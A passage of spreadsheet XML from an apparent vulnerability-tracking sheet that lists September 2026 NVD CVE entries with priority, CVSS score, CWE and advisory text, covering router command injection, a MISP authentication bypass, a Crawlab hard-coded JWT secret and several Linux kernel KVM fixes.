      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>An attacker can craft a malicious link that, if used by a legitimate user, may cause the user's browser to run JavaScript supplied by the attacker.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15639</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40855</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to a command injection. The vulnerability exists in the ping functionality within the /cgi-bin/portal.cgi endpoint, specifically affecting the ping_ip, ping_size, and ping_times POST parameters. The root cause is the failure to verify and sanitize user-supplied input before incorporating it into a system command. This allows an authenticated attacker to execute arbitrary commands on the shell and gain root access to the system.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40855</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58147</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains an OS command injection vulnerability in the portal.cgi component's password change functionality. The application improperly neutralizes special elements in the http_passwd_hidden and http_passwdConfirm_hidden parameters, allowing an authenticated attacker to execute arbitrary commands on the underlying operating system with root privileges.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58147</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73172</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the edgserver management service of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to execute arbitrary OS commands as root via crafted requests to TCP port 5058.</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73172</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89082</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>HP has identified potential security vulnerabilities in the HP Advance software that may enable elevation of privilege, remote code execution, or arbitrary file write under certain conditions, impacting the HP Advance server hosting the software.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89082</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89083</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>HP
has identified potential security vulnerabilities in the HP Advance software
that may enable elevation of privilege, remote code execution, or arbitrary
file write under certain conditions, impacting the HP Advance server hosting
the software.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89083</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89775</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Handle negative S1 walk levels in VNCR TLB size evaluation
Computing the effects of a TLB invalidation involves looking at
the size of the mapping cached by the TLB. For S1 mappings such as
VNCR, this is deducted from the combination of the base granule size
and the mapping level.
However, this implies that the S1 MMU is *on*. When the MMU is off,
we indicate this with the level being set to a "creative" value of
-127 (S1_MMU_DISABLED).
This ends-up being misinterpreted by pgshift_level_to_ttl() as it
doesn't handle negative levels at all (the level is immediately cast
to a u8 and only the bottom two bits considered), leading to an
invalidation size of 0. Not helpful.
Tidy-up pgshift_level_to_ttl() to handle these negative levels, and
ttl_to_size() to always return SZ_1G when no valid TTL is present.
This allows the removal of open-coded checks for similar situations.
Note that the check for a negative value not explicitely checking for
S1_MMU_DISABLED is deliberate, so that actual negative levels introduced
with LVA2 and D128 can take the same path if we ever support them.</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89775</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89914</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Sign-extend VA for range-based TLBI invalidation
When the decode_range_tlbi() helper was moved to be used for S1 TLBIs,
the required sign extension was omitted. Add it.
As a result, special care must be taken to not overflow PA bits when
this is used for S2 invalidation.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89914</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89915</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Remove VM-wide VNCR mapping counter
The global VNCR mapping counter is used to decide whether an L1
provided VNCR page is mapped in L0 on any CPU at the point of
dealing with a TLB invalidation. It is incremented when a mapping
is made in the fixmap, and decremented when unmapped.
As it turns out, this tracking has several flaws:
- we are trying to invalidate TLBs, and the mapping is only an
  opportunistic consequence of the TLB. Checking this counter to
  decide whether a TLB needs to be invalidated may result in missed
  invalidations.
- an L1 vcpu invalidating its own TLB (a very likely case) will not
  succeed in invalidating the VNCR pseudo TLB because that page is
  not mapped in L0 at this stage.
Given that this tracking fails at delivering the minimum guarantees
that are required and is only a performance optimisation, remove it
completely.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89915</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89916</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Make VNCR invalidation participate in MMU invalidation retry
A VNCR TLB invalidation can occur on one vcpu while another vcpu is
faulting in this same page. Without correctly handling this, we can
end up with the following scenario:
- vcpu A walks the PTs to translate VNCR
- before vcpu A is able to grab the MMU lock to insert the TLB,
  vcpu B updates the S1 PTs with an invalid entry, and issues
  a TLBI S1E2 for this VA
- vcpu A inserts the TLB for something that is now invalid
This isn't a new problem, and we manage S2 by having the MMU notifier
to bump up mmu_invalidate_seq on invalidation so that the fault can be
replayed.
We can perform something similar here, and extend invalidate_vncr_va() to
update the same counter, clearly indicating that the context has
changed under our feet. This is safe as the invalidation always happen
while holding the MMU lock for write, and that we sample the sequence
number before walking S1.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89916</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89918</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Correctly handle end of VA space TLBI invalidation
Our TLB invalidation by VA code is based on comparing two ranges,
one defined by the TLB, and one defined by the TLBI instruction.
Each range is defined by a start and a size. However, the way the
comparison is done doesn't account for address rollover, as it
compares an address with (base + size). This works nicely until
this expression represent the last page/block in the TTBR1 VA space,
as the result is a big fat 0. And a failed TLB invalidation.
Rewrite the comparison in a way that is immune to the address
rollover (making the end address inclusive instead of exclusive),
and move this into a common helper that is used by both VA and IPA
invalidations, as suggested by Hyunwoo Kim (although the IPA version
didn't suffer from this particular problem, obviously).</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89918</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89930</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVMX: Service local TLB flushes on failed nested VM-Enter
KVM services local TLB flushes on "full" nested VM-Exits (through
__nested_vmx_vmexit()), but not if a nested VM-Enter fails (e.g. due to
failed VMCS checks in nested_vmx_enter_non_root_mode()).
However, it is possible that KVM had queued TLB flushes that need to be
performed, even if the nested VM-Enter was not successful. For example,
if VPID is disabled for L2 (via nested_vmx_transition_tlb_flush(), or if
via the MSR load lists, as the SDM says:
  If any MSR is being loaded in such a way that would architecturally
  require a TLB flush, the TLBs are updated so that, after VM entry, the
  logical processor will not use any translations that were cached before
  the transition.
The SDM is unclear about when the TLB flush should occur, and whether or
not a failed VM entry would flush the TLB, so it is safer to always
do the TLB flush in this case.
More concretely, KVM also updates the last VPID L1 used for L2 in
nested_vmx_transition_tlb_flush() (i.e. last_vpid), even if the VM entry
ultimately fails. With the current code, KVM could miss a TLB flush if
L1 changes L2's VPID, then does a failed VM entry followed by a
successful one, as the failed VM entry would update last_vpid but not
actually flush the TLB. Servicing local TLB flushes on failed VM entries
makes sure that the TLB is always flushed when last_vpid is updated.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89930</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90049</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: skbuff: don't skb_tx_error() the source skb in skb_zerocopy()
skb_zerocopy() copies frags from @from into @to. On an
skb_orphan_frags() failure it calls skb_tx_error(@from), a destructive
operation on the source skb the copy helper does not own. That completes
@from's zerocopy uarg and clears SKBFL_ALL_ZEROCOPY, including the
SKBFL_SHARED_FRAG page-ownership marker.
Both callers already report the failure on their own drop path.
nfnetlink_queue does it at nla_put_failure, and Open vSwitch does it in
the flow-miss drop arm of ovs_dp_process_packet(), so nothing is lost by
dropping it here.
On Open vSwitch's OVS_ACTION_ATTR_USERSPACE path the skb is not freed on
this error: do_execute_actions() ignores output_userspace()'s return
value and, unless the upcall was the last action, keeps forwarding the
same skb through the flow's remaining actions. The uarg is completed
while that skb is still in flight, telling the producer its buffers are
free, and SKBFL_SHARED_FRAG is cleared on an skb the rest of the stack
still handles. That flag is what makes esp_input() call skb_cow_data()
instead of decrypting in place, so a later local ESP delivery can
decrypt over frags the skb does not own privately.
Leave error reporting to the callers.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90049</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90945</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Crawlab through 0.6.3 uses a hard-coded HMAC-SHA256 secret for JWT token signing that cannot be overridden via configuration or environment variables. Unauthenticated attackers can forge valid administrator tokens to access administrative APIs and execute code on worker nodes.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90945</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90961</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-287</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>The LdapAuth and LinOTPAuth authentication plugins in MISP contain an authentication bypass vulnerability. Both LdapAuthenticate and LinOTPAuthenticate replace CakePHP's FormAuthenticate class but fail to replicate its _checkFields() input validation guard. As a result, the email and password fields extracted from the login request are passed to downstream authentication logic without verifying that they are non-empty strings.
In the LDAP authenticator, an empty or null password is forwarded to ldap_bind(). Per RFC 4513 section 5.1.2, a bind request with a valid DN and an empty password constitutes an unauthenticated bind, which many LDAP directory servers accept as successful. An attacker who knows any valid user email address in the directory can therefore authenticate as that user without possessing a password. Additionally, non-string values (null, false, arrays) are either coerced to empty strings by ldap_bind(), raise TypeErrors, or are misinterpreted as find conditions in _findUser(), all of which can lead to unintended authentication outcomes.
In the LinOTP authenticator, the same missing guard allows non-string credentials to be concatenated into the LinOTP verification request, and in the mixed-authentication branch an empty password is accepted against a stored hash of the empty string.
A secondary issue in the LDAP authenticator is that newly created user accounts (auto-provisioned on first LDAP login) were assigned an empty password. Because the save path skips validation, the empty string is hashed and stored. If the user later ceases to be found in LDAP and the mixed-authentication fallback is used, the stored hash of the empty string verifies against an empty password, again permitting unauthenticated access.
The vulnerability requires that the affected plugin (LdapAuth or LinOTPAuth) is enabled on the MISP instance and that the attacker knows at least one valid email address registered in the directory or MISP user store. No prior authentication is required. Successful exploitation grants the attacker the full privileges of the impersonated user, which may include administrative access to threat intelligence data.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90961</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91104</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
